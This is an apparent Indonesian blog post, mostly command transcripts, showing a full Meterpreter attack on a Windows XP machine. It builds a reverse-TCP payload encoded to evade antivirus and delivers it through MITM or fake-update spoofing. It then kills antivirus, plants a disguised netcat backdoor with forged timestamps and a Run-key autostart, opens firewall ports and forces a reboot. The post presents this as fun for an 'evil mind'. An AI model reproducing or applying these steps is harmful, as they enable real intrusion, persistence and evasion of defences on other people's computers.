.fun and profit with meterpreter.

.so lets make ur choice kiddo,dengan mengacu sebelumnya pada artikel.

.meterpreter non encode.

[email protected]:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 X > meterpreter_1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 278
Options: LHOST=192.168.0.12,LPORT=455

http://www.virustotal.com/analisis/4b0a655b264b23b2f4dab74688c8890e
Result: 1/39

.meterpreter with encode XOR.

[email protected]:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 R | ./msfencode -e x86/shikata_ga_nai -b '' -t exe -o meterpreter_2.exe
[*] x86/shikata_ga_nai succeeded, final size 306

http://www.virustotal.com/analisis/cbb1cf1a7ce9943c5d8d15f210da8361
Result: 0/39 (0%)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.12
LHOST => 192.168.0.12
msf exploit(handler) > set LPORT 455
LPORT => 455
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

.next move is critical,well sekarang attacker membuat target agar mengeksekusi meterpreter_2.exe sebeneranya ini tergantung imajinasi anda sendiri.
.penulis sendiri memilih ettercap sebagai jembatan menggunakan metode MITM. bisa dengan ettercap filter yang akan membuat popup setiap target melakukan browsing.
.ataupun dengan kombinasi evilgrade( www.infobyte.com.ar )+ettercap dengan DNS spoofing secara tidak langsung akan mengelabui target untuk melakukan fake patch
untuk beberapa program yang ada di evilgrade exam: winamp,winzip,notepad++ bisa juga menambahkan modul tersendiri di evilgrade; firefox ataupun thunderbird (-.-)”.

.setelah target mengeksekusi meterperter_2.exe.

[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.12:455 -> 192.168.0.5:1037)


meterpreter > sysinfo
Computer: PENTEST3
OS      : Windows XP (Build 2600, Service Pack 3).

.with remote desktop.
.there is for Virtual Network Computing look, im prefer CLI than GUI (^^)V.

meterpreter > run getgui
-----------------passing------------------------


.kill AV.
meterpreter > run killav
[*] Killing Antivirus services on the target...

.ok bisa juga dengan mengedit killav.rb untuk menambahkan beberapa list AV tersendiri.

[email protected]:~# vi /pentest/exploits/framework3/scripts/meterpreter/killav.rb
#
# Meterpreter script that kills all Antivirus processes
# Provided by: Jerome Athias 
#

print_status("Killing Antivirus services on the target...")

avs = %W{
        AAWTray.exe
        Ad-Aware.exe
        MSASCui.exe
        _avp32.exe
        _avpcc.exe
        _avpm.exe
        aAvgApi.exe
        ackwin32.exe
        adaware.exe
        advxdwin.exe
        agentsvr.exe
        agentw.exe
        alertsvc.exe
        alevir.exe
        alogserv.exe
        amon9x.exe
        anti-trojan.exe
-----------------cut------------------------


windows enumiration

meterpreter > run winemun
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 192.168.0.5:1037...
[*] Saving report to /neo/.msf3/logs/winenum/192.168.0.5_20090216.174854613/192.168.0.5_20090216.174854613.txt
[*] Checking if PENTEST3 is a Virtual Machine ........
[*]     This is a VMWare virtual Machine
[*] Running Command List ...
[*]     running command cmd.exe /c set
[*]     running command arp -a
[*]     running command ipconfig /all
[*]     running command ipconfig /displaydns
[*]     running command route print
[*]     running command net view
[*]     running command netstat -nao
[*]     running command netstat -vb
[*]     running command netstat -ns
[*]     running command net accounts
[*]     running command net accounts /domain
[*]     running command net session
-----------------cut------------------------

example output winenum

[email protected]:~# cat /neo/.msf3/logs/winenum/192.168.0.5_20090216.174854613/192.168.0.5_20090216.174854613.txt
Date:       2009-02-16.02:17:48
Running as: PENTEST3pentest3
Host:       PENTEST3
OS:         Windows XP (Build 2600, Service Pack 3).

This is a VMWare virtual Machine

*****************************************
      Output of cmd.exe /c set
*****************************************
ALLUSERSPROFILE=C:Documents and SettingsAll Users
APPDATA=C:Documents and Settingspentest3Application Data
CLIENTNAME=Console
CommonProgramFiles=C:Program FilesCommon Files
COMPUTERNAME=PENTEST3
ComSpec=C:WINDOWSsystem32cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=Documents and Settingspentest3
LOGONSERVER=PENTEST3
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSystem32Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 15 Stepping 13, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0f0d
ProgramFiles=C:Program Files
PROMPT=$P$G
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:WINDOWS
TEMP=C:DOCUME~1pentest3LOCALS~1Temp
TMP=C:DOCUME~1pentest3LOCALS~1Temp
USERDOMAIN=PENTEST3
-----------------cut------------------------

.bagaimana bila winemun ruby dalam framework3/scripts/meterpreter/winenum.rb.
.penulis lakukan modifikasi hingga yang di dump adalah my document bukan lagi registry ^_^V.

.netcat as backdoor.
.swiss army knife menggunakan TCP dan UDP dalam melakukan koneksi,penulis akan membahas penggunaan backd00r dalam wind#ws b0x.
.walaupun banyak antivirus menggangap netcat sebagai hacktool .

meterpreter > use priv
Loading extension priv...success.

meterpreter > upload /tmp/system32.exe C:windowssystem32
[*] uploading  : /tmp/system32.exe -> C:windowssystem32
[*] uploaded   : /tmp/system32.exe -> C:windowssystem32system32.exe

.change file times.

meterpreter > timestomp C:windowssystem32system32.exe -v
Modified      : Tue Feb 24 20:27:49 -0500 2009
Accessed      : Thu Feb 26 09:29:39 -0500 2009
Created       : Tue Feb 24 20:27:49 -0500 2009
Entry Modified: Thu Feb 26 09:29:39 -0500 2009

meterpreter > timestomp C:windowssystem32system32.exe -b
[*] Blanking file MACE attributes on C:windowssystem32system32.exe

meterpreter > timestomp C:windowssystem32system32.exe -f C:windowssystem32cmd.exe
[*] Setting MACE attributes on C:windowssystem32system32.exe from C:windowssystem32cmd.exe

meterpreter > timestomp C:windowssystem32system32.exe -v
Modified      : Sun Apr 13 18:42:16 -0400 2008
Accessed      : Sat Feb 28 05:06:19 -0500 2009
Created       : Thu Aug 23 08:00:00 -0400 2001
Entry Modified: Sat Feb 28 05:06:19 -0500 2009

meterpreter > reg enumkey -k HKLMsoftwaremicrosoftwindowscurrentversionrun
Enumerating: HKLMsoftwaremicrosoftwindowscurrentversionrun

  Values (3):

        SunJavaUpdateSched
        VMware Tools
        VMware User Process

meterpreter > reg setval -k HKLMsoftwaremicrosoftwindowscurrentversionrun -v system32 -d "C:windowssystem32system32.exe -Ldp 455 -e cmd.exe"
Successful set system32.

meterpreter > reg queryval -k HKLMsoftwaremicrosoftwindowscurrentversionRun -v system32
Key: HKLMsoftwaremicrosoftwindowscurrentversionRun
Name: system32
Type: REG_SZ
Data: C:windowssystem32system32.exe -Ldp 455 -e cmd.exe

.bypass XP default firewall.
.ada 2 metode dalam baypass firewall dari XP,dengan registry ataupun dengan network shell.

.with registry edit.

meterpreter > reg enumkey -k HKLMsystemcontrolset001servicessharedaccessparametersfirewallpolicyStandardprofileauthorizedapplicationslist
Enumerating: HKLMsystemcontrolset001servicessharedaccessparametersfirewallpolicyStandardprofileauthorizedapplicationslist

No children.

meterpreter > reg setval -k HKLMsystemcontrolset001servicessharedaccessparametersfirewallpolicyStandardprofileauthorizedapplicationslist -v system32 -d "C:WINDOWSsystem32system32.exe:*:Enabled:system32"
Successful set system32.

meterpreter > reg queryval -k HKLMsystemcontrolset001servicessharedaccessparametersfirewallpolicyStandardprofileauthorizedapplicationslist -v system32
Key: HKLMsystemcontrolset001servicessharedaccessparametersfirewallpolicyStandardprofileauthorizedapplicationslist
Name: system32
Type: REG_SZ
Data: C:WINDOWSsystem32system32.exe:*:Enabled:system32

.with “netsh” command.

C:Documents and Settingspentest3Desktop>Netsh firewall show opmode
Netsh firewall show opmode

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable <<<< this
Exception mode                    = Enable <<<< this

Local Area Connection 2 firewall configuration:
-------------------------------------------------------------------
Operational mode                  = Enable

.setting firewall menarik disana adalah operation dan exception mode yang enable.
.sehingga attacker dapat melakukan penambahan port yang terbuka.

C:Documents and Settingspentest3Desktop>netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
ok.

C:Documents and Settingspentest3Desktop>netsh firewall show portopening
netsh firewall show portopening

Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
455    TCP       Enable   Service Firewall              <<<< this
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

.change target XP desktop wallpaper.
.secata default XP menamakan wallpaper desktopnya dengan wallpaper1.bmp, sehingga kita dapat melakukan replace.
.is this funny?.

meterpreter > upload /neo/wallpaper1.bmp "C:documents and settingspentest3local settingsapplication datamicrosoft"
[*] uploading  : /neo/wallpaper1.bmp -> C:documents and settingspentest3local settingsapplication datamicrosoft
[*] uploaded   : /neo/wallpaper1.bmp -> C:documents and settingspentest3local settingsapplication datamicrosoftwallpaper1.bmp


meterpreter > execute -H -i -f cmd.exe
Process 1096 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Documents and Settingspentest3Desktop>

.one more funny stuff.
.dengan shutdown command attacker dapat melakukan shutdown/restart dengan timeout,with funny message.

C:Documents and Settingspentest3Desktop>shutdown -r -f -c "::your box are belong to us::" -t 13
shutdown -r -f -c "::your box are belong to us::" -t 13


msf > connect 192.168.0.5 455
[*] Connected to 192.168.0.5:455
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Documents and Settingspentest3>

are u makes fun kidd0?

upgrade ur evil mind and imagination,explore out of the sphere,think out of the box
make ur choice;

EOF--

One Response to “.fun and profit with meterpreter.”

1. i_am_r00+ says:

   June 6, 2009 at 8:08 pm

   I don’t know a word of Indonesian, but the commands are extremely helpful. Thanks for the help!

   Reply